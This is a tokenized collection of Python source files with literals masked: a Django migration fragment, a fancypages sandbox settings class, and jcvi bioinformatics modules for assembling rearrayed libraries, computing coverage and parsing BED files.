] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> 
u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:5>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:max_length>' : '<STR_LIT:3>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : 
"<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] <EOL> symmetrical = True </s>
<s> from __future__ import unicode_literals , absolute_import <EOL> import os <EOL> import django <EOL> import fancypages as fp <EOL> from configurations import Configuration , values <EOL> class Common ( Configuration ) : <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> SECRET_KEY = values . Value ( '<STR_LIT>' ) <EOL> ADMINS = [ ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> MANAGERS = ADMINS <EOL> EMAIL_BACKEND = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> LANGUAGES = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> FP_FORM_BLOCK_CHOICES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:name>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } } <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = [ ] <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> MIDDLEWARE_CLASSES = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> AUTHENTICATION_BACKENDS = ( <EOL> '<STR_LIT>' , ) <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT>' <EOL> APPEND_SLASH = True <EOL> ALLOWED_HOSTS = [ '<STR_LIT:*>' ] <EOL> SITE_ID = <NUM_LIT:1> <EOL> @ property <EOL> def ROOT_URLCONF ( self ) : <EOL> return "<STR_LIT>" . format ( self . SANDBOX_MODULE ) <EOL> @ property <EOL> def WSGI_APPLICATION ( self ) : <EOL> return "<STR_LIT>" . format ( self . SANDBOX_MODULE ) <EOL> @ classmethod <EOL> def pre_setup ( cls ) : <EOL> super ( Common , cls ) . pre_setup ( ) <EOL> from fancypages . 
defaults import FANCYPAGES_SETTINGS <EOL> for key , value in FANCYPAGES_SETTINGS . iteritems ( ) : <EOL> if not hasattr ( cls , key ) : <EOL> setattr ( cls , key , value ) <EOL> @ property <EOL> def TEMPLATE_DIRS ( self ) : <EOL> return [ self . get_location ( '<STR_LIT>' ) ] <EOL> @ property <EOL> def MEDIA_ROOT ( self ) : <EOL> return self . get_location ( '<STR_LIT>' ) <EOL> @ property <EOL> def STATIC_ROOT ( self ) : <EOL> return self . get_location ( '<STR_LIT>' ) <EOL> @ property <EOL> def DATABASES ( self ) : <EOL> return { '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . get_location ( '<STR_LIT>' ) } } <EOL> @ property <EOL> def REQUIRED_APPS ( self ) : <EOL> apps = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] + fp . get_required_apps ( ) + [ '<STR_LIT>' ] <EOL> if django . VERSION [ <NUM_LIT:1> ] < <NUM_LIT:7> : <EOL> apps . append ( '<STR_LIT>' ) <EOL> return apps <EOL> @ classmethod <EOL> def get_location ( cls , * path ) : <EOL> """<STR_LIT>""" <EOL> path = ( cls . SANDBOX_MODULE , ) + path <EOL> return os . path . join ( <EOL> os . path . dirname ( os . path . realpath ( __file__ ) ) , '<STR_LIT:..>' , * path ) </s>
<s> __author__ = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> __copyright__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import sys <EOL> import logging <EOL> import os <EOL> import os . path as op <EOL> from jcvi . apps . base import OptionParser , OptionGroup , ActionDispatcher , sh <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . dispatch ( globals ( ) ) <EOL> def prepare ( args ) : <EOL> """<STR_LIT>""" <EOL> from operator import itemgetter <EOL> from jcvi . formats . fasta import Fasta , SeqIO <EOL> p = OptionParser ( prepare . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> g = OptionGroup ( p , "<STR_LIT>" ) <EOL> g . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option_group ( g ) <EOL> opts , args = p . parse_args ( args ) <EOL> if not opts . rearray_lib or not opts . orig_lib_file : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( not p . print_help ( ) ) <EOL> rearraylib , origlibfile = opts . rearray_lib , opts . orig_lib_file <EOL> if not op . isfile ( origlibfile ) : <EOL> logging . error ( "<STR_LIT>" . format ( origlibfile ) ) <EOL> sys . exit ( ) <EOL> lookuptblfile = rearraylib + '<STR_LIT>' <EOL> logging . debug ( lookuptblfile ) <EOL> if not op . isfile ( lookuptblfile ) : <EOL> logging . error ( "<STR_LIT>" . format ( lookuptblfile ) ) <EOL> sys . exit ( ) <EOL> rearraylibfile = rearraylib + '<STR_LIT>' <EOL> logging . debug ( rearraylibfile ) <EOL> if not op . isfile ( rearraylibfile ) : <EOL> logging . error ( "<STR_LIT>" . format ( rearraylibfile ) ) <EOL> sys . exit ( ) <EOL> origlibFasta = Fasta ( origlibfile ) <EOL> rearraylibFasta = Fasta ( rearraylibfile ) <EOL> origlibids = [ o for o in origlibFasta . iterkeys_ordered ( ) ] <EOL> rearraylibids = [ r for r in rearraylibFasta . iterkeys_ordered ( ) ] <EOL> if not op . isdir ( opts . 
output_folder ) : <EOL> logging . warning ( "<STR_LIT>" . format ( opts . output_folder ) ) <EOL> os . makedirs ( opts . output_folder ) <EOL> logfile = rearraylib + '<STR_LIT>' <EOL> log = open ( logfile , '<STR_LIT:w>' ) <EOL> fp = open ( lookuptblfile , '<STR_LIT:r>' ) <EOL> for row in fp : <EOL> origprefix , rearrayprefix = itemgetter ( <NUM_LIT:0> , <NUM_LIT:3> ) ( row . split ( '<STR_LIT:\t>' ) ) <EOL> libpair = origprefix + '<STR_LIT:_>' + rearrayprefix <EOL> outfile = opts . output_folder + '<STR_LIT:/>' + libpair + '<STR_LIT>' <EOL> ofp = open ( outfile , '<STR_LIT:w>' ) <EOL> for o in origlibids : <EOL> if re . match ( origprefix , o ) : <EOL> SeqIO . write ( origlibFasta [ o ] , ofp , '<STR_LIT>' ) <EOL> for r in rearraylibids : <EOL> if re . match ( rearrayprefix , r ) : <EOL> SeqIO . write ( rearraylibFasta [ r ] , ofp , '<STR_LIT>' ) <EOL> ofp . close ( ) <EOL> print >> log , outfile <EOL> log . close ( ) <EOL> logging . debug ( '<STR_LIT>' . format ( logfile ) ) <EOL> def assemble ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( assemble . __doc__ ) <EOL> g1 = OptionGroup ( p , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> g1 . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> g1 . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> g1 . add_option ( "<STR_LIT>" , default = None , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option_group ( g1 ) <EOL> g2 = OptionGroup ( p , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> g2 . add_option ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT:20> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" + "<STR_LIT>" ) <EOL> g2 . add_option ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" + "<STR_LIT>" ) <EOL> g2 . add_option ( "<STR_LIT>" , "<STR_LIT>" , default = <NUM_LIT> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" + "<STR_LIT>" ) <EOL> g2 . 
add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option_group ( g2 ) <EOL> p . set_params ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if opts . max_gap_len and opts . max_gap_len <= <NUM_LIT:1> : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> elif opts . ovl_pct_id and opts . ovl_pct_id <= <NUM_LIT> : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> elif opts . ovl_sim_score and opts . ovl_sim_score <= <NUM_LIT> : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> file_list = [ ] <EOL> if opts . input_file_list : <EOL> if not op . isfile ( opts . input_file_list ) : <EOL> logging . error ( "<STR_LIT>" . format ( opts . input_file_list ) ) <EOL> sys . exit ( ) <EOL> with open ( opts . input_file_list , '<STR_LIT:r>' ) as f : <EOL> file_list = f . read ( ) . splitlines ( ) <EOL> elif opts . input_folder : <EOL> if not op . isdir ( opts . input_folder ) : <EOL> logging . error ( "<STR_LIT>" . format ( opts . input_folder ) ) <EOL> sys . exit ( ) <EOL> file_list = [ file for file in os . listdir ( opts . input_folder ) if file . lower ( ) . endswith ( '<STR_LIT>' ) or file . lower ( ) . endswith ( '<STR_LIT>' ) ] <EOL> folder = opts . input_folder <EOL> folder = folder . rstrip ( '<STR_LIT:/>' ) <EOL> for i in xrange ( len ( file_list ) ) : <EOL> file_list [ i ] = folder + "<STR_LIT:/>" + file_list [ i ] <EOL> elif opts . input_file : <EOL> file_list . append ( opts . input_file ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" ) <EOL> sys . exit ( not p . print_help ( ) ) <EOL> if len ( file_list ) == <NUM_LIT:0> : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> sys . exit ( ) <EOL> for file in file_list : <EOL> if not op . isfile ( file ) : <EOL> logging . warning ( "<STR_LIT>" . format ( file ) ) <EOL> else : <EOL> cmd = "<STR_LIT>" . format ( file , opts . max_gap_len , opts . ovl_pct_id , opts . ovl_sim_score , opts . 
prefix ) <EOL> if opts . extra : <EOL> cmd += "<STR_LIT>" . format ( opts . extra ) <EOL> logfile = "<STR_LIT>" . format ( file , opts . prefix ) <EOL> sh ( cmd , outfile = logfile ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import sys <EOL> import logging <EOL> from collections import defaultdict <EOL> from jcvi . formats . base import BaseFile , must_open <EOL> from jcvi . formats . fasta import gaps <EOL> from jcvi . formats . sizes import Sizes <EOL> from jcvi . formats . posmap import query , bed <EOL> from jcvi . formats . bed import BedLine , sort <EOL> from jcvi . apps . base import OptionParser , ActionDispatcher , sh , need_update <EOL> class Coverage ( BaseFile ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , bedfile , sizesfile ) : <EOL> bedfile = sort ( [ bedfile ] ) <EOL> coveragefile = bedfile + "<STR_LIT>" <EOL> if need_update ( bedfile , coveragefile ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( bedfile , sizesfile ) <EOL> sh ( cmd , outfile = coveragefile ) <EOL> self . sizes = Sizes ( sizesfile ) . mapping <EOL> filename = coveragefile <EOL> assert filename . endswith ( "<STR_LIT>" ) <EOL> super ( Coverage , self ) . __init__ ( filename ) <EOL> def get_plot_data ( self , ctg , bins = None ) : <EOL> import numpy as np <EOL> from jcvi . algorithms . matrix import chunk_average <EOL> fp = open ( self . filename ) <EOL> size = self . sizes [ ctg ] <EOL> data = np . zeros ( ( size , ) , dtype = np . int ) <EOL> for row in fp : <EOL> seqid , start , end , cov = row . split ( ) <EOL> if seqid != ctg : <EOL> continue <EOL> start , end = int ( start ) , int ( end ) <EOL> cov = int ( cov ) <EOL> data [ start : end ] = cov <EOL> bases = np . arange ( <NUM_LIT:1> , size + <NUM_LIT:1> ) <EOL> if bins : <EOL> window = size / bins <EOL> bases = bases [ : : window ] <EOL> data = chunk_average ( data , window ) <EOL> return bases , data <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . 
dispatch ( globals ( ) ) <EOL> def clone_name ( s , ca = False ) : <EOL> """<STR_LIT>""" <EOL> if not ca : <EOL> return s [ : - <NUM_LIT:1> ] <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT:1>' : <EOL> return s [ <NUM_LIT:2> : ] <EOL> return s . rstrip ( '<STR_LIT>' ) <EOL> def bed_to_bedpe ( bedfile , bedpefile , pairsbedfile = None , matesfile = None , ca = False ) : <EOL> """<STR_LIT>""" <EOL> fp = must_open ( bedfile ) <EOL> fw = must_open ( bedpefile , "<STR_LIT:w>" ) <EOL> if pairsbedfile : <EOL> fwpairs = must_open ( pairsbedfile , "<STR_LIT:w>" ) <EOL> clones = defaultdict ( list ) <EOL> for row in fp : <EOL> b = BedLine ( row ) <EOL> name = b . accn <EOL> clonename = clone_name ( name , ca = ca ) <EOL> clones [ clonename ] . append ( b ) <EOL> if matesfile : <EOL> fp = open ( matesfile ) <EOL> libraryline = fp . next ( ) <EOL> lib , name , smin , smax = libraryline . split ( ) <EOL> assert lib == "<STR_LIT>" <EOL> smin , smax = int ( smin ) , int ( smax ) <EOL> logging . debug ( "<STR_LIT>" . format ( name , smin , smax ) ) <EOL> nbedpe = <NUM_LIT:0> <EOL> nspan = <NUM_LIT:0> <EOL> for clonename , blines in clones . items ( ) : <EOL> if len ( blines ) == <NUM_LIT:2> : <EOL> a , b = blines <EOL> aseqid , astart , aend = a . seqid , a . start , a . end <EOL> bseqid , bstart , bend = b . seqid , b . start , b . end <EOL> print >> fw , "<STR_LIT:\t>" . join ( str ( x ) for x in ( aseqid , astart - <NUM_LIT:1> , aend , <EOL> bseqid , bstart - <NUM_LIT:1> , bend , clonename ) ) <EOL> nbedpe += <NUM_LIT:1> <EOL> else : <EOL> a , = blines <EOL> aseqid , astart , aend = a . seqid , a . start , a . 
end <EOL> bseqid , bstart , bend = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> <EOL> if pairsbedfile : <EOL> start = min ( astart , bstart ) if bstart > <NUM_LIT:0> else astart <EOL> end = max ( aend , bend ) if bend > <NUM_LIT:0> else aend <EOL> if aseqid != bseqid : <EOL> continue <EOL> span = end - start + <NUM_LIT:1> <EOL> if ( not matesfile ) or ( smin <= span <= smax ) : <EOL> print >> fwpairs , "<STR_LIT:\t>" . join ( str ( x ) for x in ( aseqid , start - <NUM_LIT:1> , end , clonename ) ) <EOL> nspan += <NUM_LIT:1> <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( nbedpe , bedpefile ) ) <EOL> if pairsbedfile : <EOL> fwpairs . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( nspan , pairsbedfile ) ) <EOL> def posmap ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( posmap . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:3> : <EOL> sys . exit ( p . print_help ( ) ) <EOL> frgscffile , fastafile , scf = args <EOL> cmd = "<STR_LIT>" . format ( fastafile , scf ) <EOL> scffastafile = scf + "<STR_LIT>" <EOL> if not op . exists ( scffastafile ) : <EOL> sh ( cmd , outfile = scffastafile ) <EOL> sizesfile = scffastafile + "<STR_LIT>" <EOL> sizes = Sizes ( scffastafile ) . mapping <EOL> scfsize = sizes [ scf ] <EOL> logging . debug ( "<STR_LIT>" . format ( scf , scfsize ) ) <EOL> gapsbedfile = scf + "<STR_LIT>" <EOL> if not op . exists ( gapsbedfile ) : <EOL> args = [ scffastafile , "<STR_LIT>" , "<STR_LIT>" ] <EOL> gaps ( args ) <EOL> posmapfile = scf + "<STR_LIT>" <EOL> if not op . exists ( posmapfile ) : <EOL> args = [ frgscffile , scf ] <EOL> query ( args ) <EOL> bedfile = scf + "<STR_LIT>" <EOL> if not op . exists ( bedfile ) : <EOL> args = [ posmapfile ] <EOL> bed ( args ) <EOL> bedpefile = scf + "<STR_LIT>" <EOL> pairsbedfile = scf + "<STR_LIT>" <EOL> if not ( op . exists ( bedpefile ) and op . 
exists ( pairsbedfile ) ) : <EOL> bed_to_bedpe ( bedfile , bedpefile , pairsbedfile = pairsbedfile , ca = True ) <EOL> Coverage ( bedfile , sizesfile ) <EOL> Coverage ( pairsbedfile , sizesfile ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import os . path as op <EOL> import sys <EOL> import math <EOL> import logging <EOL> import numpy as np <EOL> from collections import defaultdict <EOL> from itertools import groupby <EOL> from jcvi . formats . base import LineFile , must_open , is_number , get_number <EOL> from jcvi . formats . sizes import Sizes <EOL> from jcvi . utils . iter import pairwise <EOL> from jcvi . utils . cbook import SummaryStats , thousands , percentage <EOL> from jcvi . utils . grouper import Grouper <EOL> from jcvi . utils . natsort import natsort_key , natsorted <EOL> from jcvi . utils . range import Range , range_union , range_chain , range_distance , range_intersect <EOL> from jcvi . apps . base import OptionParser , ActionDispatcher , sh , need_update , popen <EOL> class BedLine ( object ) : <EOL> __slots__ = ( "<STR_LIT>" , "<STR_LIT:start>" , "<STR_LIT:end>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:args>" , "<STR_LIT>" ) <EOL> def __init__ ( self , sline ) : <EOL> args = sline . strip ( ) . split ( "<STR_LIT:\t>" ) <EOL> self . nargs = nargs = len ( args ) <EOL> self . seqid = args [ <NUM_LIT:0> ] <EOL> self . start = int ( args [ <NUM_LIT:1> ] ) + <NUM_LIT:1> <EOL> self . end = int ( args [ <NUM_LIT:2> ] ) <EOL> assert self . start <= self . end , "<STR_LIT>" . format ( self . start , self . end ) <EOL> self . extra = self . accn = self . score = self . strand = None <EOL> if nargs > <NUM_LIT:3> : <EOL> self . accn = args [ <NUM_LIT:3> ] <EOL> if nargs > <NUM_LIT:4> : <EOL> self . score = args [ <NUM_LIT:4> ] <EOL> if nargs > <NUM_LIT:5> : <EOL> self . strand = args [ <NUM_LIT:5> ] <EOL> if nargs > <NUM_LIT:6> : <EOL> self . extra = args [ <NUM_LIT:6> : ] <EOL> self . args = args <EOL> def __str__ ( self ) : <EOL> args = [ self . seqid , self . start - <NUM_LIT:1> , self . end ] <EOL> if self . accn is not None : <EOL> args += [ self . accn ] <EOL> if self . score is not None : <EOL> args += [ self . 
score ] <EOL> if self . strand is not None : <EOL> args += [ self . strand ] <EOL> if self . extra is not None : <EOL> args += self . extra <EOL> s = "<STR_LIT:\t>" . join ( str ( x ) for x in args ) <EOL> return s <EOL> __repr__ = __str__ <EOL> def __getitem__ ( self , key ) : <EOL> return getattr ( self , key ) <EOL> @ property <EOL> def span ( self ) : <EOL> return self . end - self . start + <NUM_LIT:1> <EOL> @ property <EOL> def range ( self ) : <EOL> strand = self . strand or '<STR_LIT:+>' <EOL> return ( self . seqid , self . start , self . end , strand ) <EOL> @ property <EOL> def tag ( self ) : <EOL> return "<STR_LIT>" . format ( self . seqid , self . start , self . end ) <EOL> def gffline ( self , type = '<STR_LIT>' , source = '<STR_LIT:default>' ) : <EOL> score = "<STR_LIT:.>" if not self . score or ( self . score and not is_number ( self . score ) ) else self . score <EOL> strand = "<STR_LIT:.>" if not self . strand else self . strand <EOL> row = "<STR_LIT:\t>" . join ( ( self . seqid , source , type , <EOL> str ( self . start ) , str ( self . end ) , score , <EOL> strand , '<STR_LIT:.>' , '<STR_LIT>' + self . accn ) ) <EOL> return row <EOL> class Bed ( LineFile ) : <EOL> def __init__ ( self , filename = None , key = None , sorted = True , juncs = False ) : <EOL> super ( Bed , self ) . __init__ ( filename ) <EOL> self . nullkey = lambda x : ( natsort_key ( x . seqid ) , x . start , x . accn ) <EOL> self . key = key or self . nullkey <EOL> if not filename : <EOL> return <EOL> for line in must_open ( filename ) : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:#>" or ( juncs and line . startswith ( '<STR_LIT>' ) ) : <EOL> continue <EOL> self . append ( BedLine ( line ) ) <EOL> if sorted : <EOL> self . sort ( key = self . key ) <EOL> def add ( self , row ) : <EOL> self . append ( BedLine ( row ) ) <EOL> def print_to_file ( self , filename = "<STR_LIT>" , sorted = False ) : <EOL> if sorted : <EOL> self . sort ( key = self . 
key ) <EOL> fw = must_open ( filename , "<STR_LIT:w>" ) <EOL> for b in self : <EOL> if b . start < <NUM_LIT:1> : <EOL> logging . error ( "<STR_LIT>" . format ( b . accn ) ) <EOL> b . start = <NUM_LIT:1> <EOL> print >> fw , b <EOL> fw . close ( ) <EOL> def sum ( self , seqid = None , unique = True ) : <EOL> return bed_sum ( self , seqid = seqid , unique = unique ) <EOL> @ property <EOL> def seqids ( self ) : <EOL> return natsorted ( set ( b . seqid for b in self ) ) <EOL> @ property <EOL> def accns ( self ) : <EOL> return natsorted ( set ( b . accn for b in self ) ) <EOL> @ property <EOL> def order ( self ) : <EOL> return dict ( ( f . accn , ( i , f ) ) for ( i , f ) in enumerate ( self ) ) <EOL> @ property <EOL> def order_in_chr ( self ) : <EOL> res = { } <EOL> self . sort ( key = self . nullkey ) <EOL> for seqid , beds in groupby ( self , key = lambda x : x . seqid ) : <EOL> for i , f in enumerate ( beds ) : <EOL> res [ f . accn ] = ( seqid , i , f ) <EOL> return res <EOL> @ property <EOL> def bp_in_chr ( self ) : <EOL> res = { } <EOL> self . sort ( key = self . nullkey ) <EOL> for seqid , beds in groupby ( self , key = lambda x : x . seqid ) : <EOL> for i , f in enumerate ( beds ) : <EOL> res [ f . accn ] = ( seqid , ( f . start + f . end ) / <NUM_LIT:2> , f ) <EOL> return res <EOL> @ property <EOL> def simple_bed ( self ) : <EOL> return [ ( b . seqid , i ) for ( i , b ) in enumerate ( self ) ] <EOL> @ property <EOL> def links ( self ) : <EOL> r = [ ] <EOL> for s , sb in self . sub_beds ( ) : <EOL> for a , b in pairwise ( sb ) : <EOL> r . append ( ( ( a . accn , a . strand ) , ( b . accn , b . strand ) ) ) <EOL> return r <EOL> def extract ( self , seqid , start , end ) : <EOL> for b in self : <EOL> if b . seqid != seqid : <EOL> continue <EOL> if b . start < start or b . end > end : <EOL> continue <EOL> yield b <EOL> def sub_bed ( self , seqid ) : <EOL> for b in self : <EOL> if b . seqid == seqid : <EOL> yield b <EOL> def sub_beds ( self ) : <EOL> self . 
